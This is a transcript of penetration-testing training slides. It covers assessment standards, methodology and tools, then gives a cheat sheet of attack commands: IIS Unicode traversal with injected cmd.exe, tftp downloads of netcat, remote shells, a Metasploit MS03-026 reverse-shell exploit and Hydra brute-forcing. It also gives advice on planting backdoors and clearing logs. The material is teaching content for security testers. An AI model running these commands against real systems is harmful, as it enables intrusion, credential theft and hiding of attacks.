NSA and PT


Published on

How To Understand Network Security Assessment and Penetration Testing

Published in: Education
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

NSA and PT

  1. 1. Program:Certified Computer Security Analyst (CCSA) LSP Telematika Created By Semi Yulianto Shared By Linuxer@kaskus.co.id
  2. 2. Semi YuliantoMCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA,CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc Independent Trainer and Consultant EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)Current Roles: ITS2 (Riyadh, Saudi Arabia) Senior Technical Trainer/Security Consultant IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia) Security Consultant (Web Application Pen-Tester) Security Consultant (ESET Anti-Virus & Smart Security)semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.comContacts:+62 852 1325 6600 and +60 14 9377 462
  3. 3. 1. Vulnerabilities by Management Categories2. Assessment Standards3. Assessment Service Definition4. Network Assessment Methodology5. Pen-Test Methodology6. Security Tools7. Investigating Vulnerabilities
  4. 4. OS configuration - Vulnerabilities due to improperly configured operating system software. Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities. Password/access control - Failure to comply with password policy and improper access control settings. Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use. Dangerous services - Existence of vulnerable or easily exploited services or processes. Application configuration - Vulnerabilities due to improperly configured applications.
  5. 5. The United States National Security Agency (NSA) has provided an NSA (US) INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com The Government Communications Headquarters (GCHQ) in the United CESG CHECK (UK) Kingdom has an information assurance arm known as the Communications and Electronics security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security Security Group (CESG). In the same way that the NSA IAM framework allows testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
  6. 6.  Assessment - Level 1 involves discovering a cooperative high-The IAM framework defines three levels of assessment: level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands- on network or system testing is undertaken at this level. Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise. Red Team - Level 3 is non cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is on intrusive, so within this framework, a Level 3 assessment involves full qualification of vulnerabilities.
  7. 7. 1. Use of DNS information retrieval tools for both single andThe CESG CHECK network security assessment as: multiple records, including an understanding of DNS record structure relating to target hosts.2. Use of ICMP, TCP, and UDP network mapping and probing tools3. Demonstration of TCP service banner grabbing.4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
  8. 8. 1. User enumeration via finger, rusers, rwho, and SMTPCESG CHECK Unix-specific competencies: techniques2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.3. Demonstration of testing for Network File System (NFS) weaknesses.4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).5. Detection of insecure X Windows servers.6. Testing for weaknesses within web, FTP, and Samba services.
  9. 9. 1. Assessment of NetBIOS and CIFS services to enumerateCESG CHECK Windows NT-specific competencies: users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.2. Username and password grinding via NetBIOS and CIFS services.3. Detecting and demonstrating presence of known security weaknesses within.4. Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
  10. 10.  ISECOM’s Open Source Security Testing MethodologyOther Assessment Standards & Associations: Manual (OSSTMM) http://www.osstmm.org Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com TIGER Scheme http://www.tigerscheme.org EC-Council’s Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm Open Source Web Application Security Project (OWASP) http://www.owasp.org
  11. 11. 1. Vulnerability Scanning2. Network Security Assessment3. Web Application Testing4. Penetration Testing5. Onsite Audit
  12. 12. Uses automated systems (such as Nessus, ISS Internet Vulnerability Scanning Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security. An effective blend of automated and hands-on manual Network Security Assessment vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.
  13. 13. Involves post-authentication assessment of web application Web Application Testing components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated. Involves multiple attack vectors (e.g., telephone war dialing, Penetration Testing social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
  14. 14. Provides the clearest picture of network security. Onsite Audition Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
  15. 15. 1. Network reconnaissance to identify IP networksHigh-level components of Network Assessment: and hosts of interest.2. Bulk network scanning and probing to identify potentially vulnerable hosts.3. Investigation of vulnerabilities and further network probing by hand.4. Exploitation of vulnerabilities and circumvention of security mechanisms.
  16. 16. 1. Information Gathering2. Service Enumeration3. Vulnerability Identification4. Penetration5. Maintaining Access6. Housekeeping
  17. 17. The objective of information gathering is to find as Information Gathering many information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering. Involves launching network and port scanning to Service Enumeration find open, filtered ports and services running on a specific port.
  18. 18. Involves finding new and currently available Vulnerability Identification vulnerability on the operating systems, applications and/or services (manual or automated). Involves active penetration on a specific target of Penetration evaluation by exploiting any new or known vulnerability.
  19. 19. Involves uploading trojan or backdoor with the Maintaining Access objective to make it easier to go in and out from a target of evaluation without having to do the exploitation and ensure that the activities are not being noticed. Clearning up to cover tracks. Involves disabling Housekeeping audit settings and clearing or altering log files (system, security and application).
  20. 20. 1. Nmap (http://www.insecure.org)Scanning Tools:2. Nessus (http://www.nessus.org)3. ISS Internet Scanner (http://www.iss.net)4. eEye Retina (http://www.eeye.com)5. QualysGuard (http://www.qualys.com)6. Matta Colossus (http://www.trustmatta.com)
  21. 21. 1. Metasploit FrameworkExploitation Frameworks: (http://www.metasploit.com)2. Core IMPACT (http://www.coresecurity.com)3. Immunity CANVAS (http://www.immunityinc.com/products- canvas.shtml)
  22. 22. 1. Paros (http://www.parosproxy.org)Proxy-based web application testing tools:2. WebScarab http://www.owasp.org/index.php/Category:OWAS P_WebScarab_Project)3. Burp suite (http://portswigger.net)
  23. 23. 1. Wapiti (http://wapiti.sourceforge.net)Active web application crawling and fuzzing tools:2. Nikto (http://www.cirt.net/code/nikto.shtml)
  24. 24. 1. Acunetix Web Vulnerability ScannerWeb Application Scanning Tools: (http://www.acunetix.com)2. Watchfire AppScan (http://www.watchfire.com/products/appscan/)3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspe ct/)4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic _hailstorm.php)
  25. 25. 1. Securiteam (http://www.securiteam.com)Useful Websites:2. SecurityFocus (http://www.securityfocus.com)3. milw0rm (http://www.milw0rm.com)4. Offensive Security Exploit DB (http://www.exploit-db.com)5. Packet Storm (http://www.packetstormsecurity.org)6. FrSIRT (http://www.frsirt.com)7. MITRE Corporation CVE (http://cve.mitre.org)8. NIST National Vulnerability Database (http://nvd.nist.gov)9. ISS X-Force (http://xforce.iss.net)10. CERT vulnerability notes (http://www.kb.cert.org/vuls)11. eEye Preview (http://research.eeye.com/html/services)12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
  26. 26. 1. Information Gathering2. Service Identification3. Vulnerability Identification4. Penetration (Exploitation)5. Maintaining Access6. Housekeeping (Covering Tracks)7. Password Cracking8. Client-Side Hacking9. Web Application Hacking10. Denial-of-Service (DoS) Attacks11. Sniffing and ARP Spoofing12. Wireless Hacking13. Linux Hacking14. Analyzing Attack Signatures with IDS and Sniffer15. Evading IDS and Firewall
  27. 27. IIS Unicode Directory Traversal Exploit Syntax: nc –v <target_ip> <http_port> GET http://<target_ip>/scripts/<unicode_string s>/<windows_dir>/cmd.exe?/c+<command> Example: nc –v 80 GET nt/system32/cmd.exe?/c+dir
  28. 28. TFTP (Trivial File Transfer Protocol)Upload and Download Syntax: tftp –i <localhost_ip> GET <file> tftp –i <localhost_ip> PUT <file> Example: tftp –i GET nc.exe tftp –i PUT nc.exe Unicode Examples: GET m32/cmd.exe?/c+tftp+-i+
  29. 29. Netcat (Network Swiss Army Knife)Server Mode (listening/reverse TCP) Syntax: nc –v –l –p <port_to_listen_to> nc –vlp <port_to_listen_to> Example: nc –v –l –p 555 nc –vlp 555
  30. 30. Netcat (Network Swiss Army Knife)Client Mode (connecting/bind TCP) Syntax: nc –v <target_ip> <target_port> Example: nc –v 555
  31. 31. Netcat (Network Swiss Army Knife)Server Mode (listening/reverse TCP) Syntax: nc –v –l –p <listening_port> Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command> Example: GET m32/cmd.exe?/c+nc+-v+-l+-p+5555
  32. 32. Netcat (Network Swiss Army Knife)Client Mode (connecting/bind TCP) Syntax: nc –v <target_ip> <target_port> Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command> Example: GET m32/cmd.exe?/c+nc+-v+
  33. 33. Nmap (Ping Sweep/Network Scan) Syntax: nmap –sP <network_id> Example: nmap –sP (Port Scan) Syntax: nmap <target_ip> Example: nmap
  34. 34. Nmap (Port Scan with Options) Syntax: nmap <option> <target_ip> Examples: nmap –sS –sV –O nmap –sS –sV –p80,443 –O nmap –sS –sV –p80,443 –O –T4 nmap –sS –sV –p80,443 –O –T4 –PN nmap –sU –sV –O nmap –A
  35. 35. Nmap (Enumeration) Syntax: nmap <option> <script> <target_ip> Examples: nmap –sS –script=smb-enum-users nmap –sS –script=smb-enum-shares nmap –sS –script=smb-enum-domains nmap –sS –script=smb-enum-processes nmap –sS –script=smb-enum-security
  36. 36. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole Syntax: msf > help msf > show exploits msf > use <exploit_module> msf > show payloads msf > set PAYLOAD <payload_type> msf > show options msf > set RHOST <target_ip> msf > set LHOST <localhost_ip> msf > set LPORT <local_port> msf > set RPORT <remote_port> msf > show targets msf > set TARGET <target_id> msf > exploit
  37. 37. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole Example: msf > help msf > show exploits msf > use windows/dcerpc/ms03_026_dcom msf > show payloads msf > set PAYLOAD windows/shell/reverse_tcp msf > show options msf > set RHOST msf > set LHOST msf > set LPORT 5555 msf > set RPORT 1234 msf > show targets msf > set TARGET 0 msf > exploit
  38. 38. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole Syntax: msf > help msf > show auxiliary msf > use <auxiliary_module> msf > set RHOSTS <target_ip_or_network_id> msf > run
  39. 39. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole Example 1: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS msf > run Example 2: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS msf > run
  40. 40. Metasploit Framework Exploit Module (MSFCLI) cd /pentest/exploits/msf3 Syntax: ./msfcli <exploit_module> <payload_type> <options> E Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST= E
  41. 41. THC Hydra (Dictionary-based Password Cracking) cd /tmp Syntax: ./hydra –L <users_file> -P <passwords_file> <target_ip> <service_type> Examples: ./hydra –L login.txt –P pass.txt ftp ./hydra –L login.txt –P pass.txt smb ./hydra –L login.txt –P pass.txt mssql ./hydra –L login.txt –P pass.txt rpc
  42. 42. Nikto (Web Application Vulnerability Scanner) cd /pentest/nikto Syntax: ./nikto.pl –host <target_ip> Example: ./nikto.pl –host